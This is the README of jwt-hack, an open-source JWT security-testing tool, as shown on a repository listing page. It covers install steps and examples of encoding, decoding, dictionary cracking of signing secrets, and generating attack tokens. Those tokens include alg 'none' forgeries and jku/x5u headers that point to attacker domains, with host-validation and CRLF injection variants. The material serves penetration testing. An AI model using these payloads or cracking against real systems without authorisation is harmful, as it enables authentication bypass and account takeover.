hahwul/ jwt-hack
About the developer
342 Stars 
53 Forks 
MIT License 
157 Commits 
1 Opened issues 
Description
🔩 jwt-hack is tool for hacking / security testing to JWT. Supported for En/decoding JWT, Generate payload for JWT attack and very fast cracking(dict/brutefoce)
Services available
Contributors list
Hack the JWT(JSON Web Token)
Installation
from the source
go1.17
go install github.com/hahwul/[email protected]
go1.16
GO111MODULE=on go get -u github.com/hahwul/jwt-hack
homebrew
brew tap hahwul/jwt-hack brew install jwt-hack
snapcraft
sudo snap install jwt-hack
Usage
d8p 8d8 d88 888888888 888 888 ,8b. doooooo 888 ,dP 88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P' 88P 888P`Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L 88888' 88P YP8 '88p 88P 888 8b `Y' d888888 888 `8p ------------------------- Hack the JWT(JSON Web Token) | by @hahwul | v1.0.0Usage: jwt-hack [command]
Available Commands: crack Cracking JWT Token decode Decode JWT to JSON encode Encode json to JWT help Help about any command payload Generate JWT Attack payloads version Show version
Flags: -h, --help help for jwt-hack
Encode mode(JSON to JWT)
â–¶ jwt-hack encode '{"json":"format"}' --secret={YOUR_SECRET}
e.g ``
â–¶ jwt-hack encode '{"test":"1234"}' --secret=asdf
d8p 8d8 d88 888888888 888 888 ,8b. doooooo 888 ,dP
88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P'
88P 888PY8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L
88888' 88P YP8 '88p 88P 888 8b Y' d888888 888
8p
INFO[0000] Encoded result algorithm=HS256 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXN0IjoiMTIzNCJ9.JOL1SYkRZYUz9GVny-DgoDj60C0RLz929h1_fFcpqQA ```
Decode mode(JWT to JSON)
â–¶ jwt-hack decode {JWT_CODE}
e.g ``` â–¶ jwt-hack decode eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
d8p 8d8 d88 888888888 888 888 ,8b. doooooo 888 ,dP 88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P' 88P 888P`Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L
88888' 88P YP8 '88p 88P 888 8b Y' d888888 888
8p
INFO[0000] Decoded data(claims) header="{\"alg\":\"HS256\",\"typ\":\"JWT\"}" method="&{HS256 5}" {"iat":1516239022,"name":"John Doe","sub":"1234567890"} ```
Crack mode(Dictionary attack / BruteForce)
â–¶ jwt-hack crack -w {WORDLIST} {JWT_CODE}
e.g ``` â–¶ jwt-hack crack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRA -w samples/wordlist.txt
d8p 8d8 d88 888888888 888 888 ,8b. doooooo 888 ,dP 88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P' 88P 888P`Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L
88888' 88P YP8 '88p 88P 888 8b Y' d888888 888
8p
[*] Start dict cracking mode INFO[0000] Loaded words (remove duplicated) size=16 INFO[0000] Invalid signature word=fas INFO[0000] Invalid signature word=asd INFO[0000] Invalid signature word=1234 INFO[0000] Invalid signature word=efq INFO[0000] Invalid signature word=asdf INFO[0000] Invalid signature word=2q INFO[0000] Found! Token signature secret is test Signature=Verified Word=test INFO[0000] Invalid signature word=dfas INFO[0000] Invalid signature word=ga INFO[0000] Invalid signature word=f INFO[0000] Invalid signature word=ds INFO[0000] Invalid signature word=sad INFO[0000] Invalid signature word=qsf ... INFO[0000] Invalid signature word=password INFO[0000] Invalid signature word=error INFO[0000] Invalid signature word=calendar [+] Found! JWT signature secret: test [+] Finish crack mode ```
Payload mode(Alg none attack, etc..)
â–¶ jwt-hack payload {JWT_CODE}
for jku and x5u (what is? readme this slide) *
--jwk-attack: A attack payload domain for jku&x5u (e.g hahwul.com) *
--jwk-trust: jku&x5u protocol (http/https) (default "https") *
--jwk-protocol: A trusted domain for jku&x5u (e.g google.com)
e.g ``` â–¶ jwt-hack payload eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.5m9zFPGPU0LMdTTLCR7jXMP8357nNAa0z8ABJJE3r3c --jwk-attack attack.hahwul.com --jwk-protocol https --jwk-trust trust.hahwul.com
INFO[0000] Generate none payload header="{\"alg\":\"none\",\"typ\":\"JWT\"}" payload=none eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate NonE payload header="{\"alg\":\"NonE\",\"typ\":\"JWT\"}" payload=NonE eyJhbGciOiJOb25FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate NONE payload header="{\"alg\":\"NONE\",\"typ\":\"JWT\"}" payload=NONE eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate jku + basic payload header="{\"alg\":\"hs256\",\"jku\":\"attack.hahwul.com\",\"typ\":\"JWT\"}" payload=jku eyJhbGciOiJoczI1NiIsImprdSI6ImF0dGFjay5oYWh3dWwuY29tIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate jku host validation payload header="{\"alg\":\"hs256\",\"jku\":\"https://trust.hahwul.comZattack.hahwul.com\",\"typ\":\"JWT\"}" payload=jku eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbVphdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate jku host validation payload header="{\"alg\":\"hs256\",\"jku\":\"https://[email protected]\",\"typ\":\"JWT\"}" payload=jku eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbUBhdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate jku host header injection (w/CRLF) payload header="{\"alg\":\"hs256\",\"jku\":\"https://trust.hahwul.com%0d0aHost: attack.hahwul.com\",\"typ\":\"JWT\"}" payload=jku eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbSUwZDBhSG9zdDogYXR0YWNrLmhhaHd1bC5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate x5u + basic payload header="{\"alg\":\"hs256\",\"x5u\":\"attack.hahwul.com\",\"typ\":\"JWT\"}" payload=x5u eyJhbGciOiJoczI1NiIsIng1dSI6ImF0dGFjay5oYWh3dWwuY29tIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate x5u host validation payload header="{\"alg\":\"hs256\",\"x5u\":\"https://trust.hahwul.comZattack.hahwul.com\",\"typ\":\"JWT\"}" payload=x5u eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbVphdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate x5u host validation payload header="{\"alg\":\"hs256\",\"x5u\":\"https://[email protected]\",\"typ\":\"JWT\"}" payload=x5u eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbUBhdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.
INFO[0000] Generate x5u host header injection (w/CRLF) payload header="{\"alg\":\"hs256\",\"x5u\":\"https://trust.hahwul.com%0d0aHost: attack.hahwul.com\",\"typ\":\"JWT\"}" payload=x5u eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbSUwZDBhSG9zdDogYXR0YWNrLmhhaHd1bC5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9. ```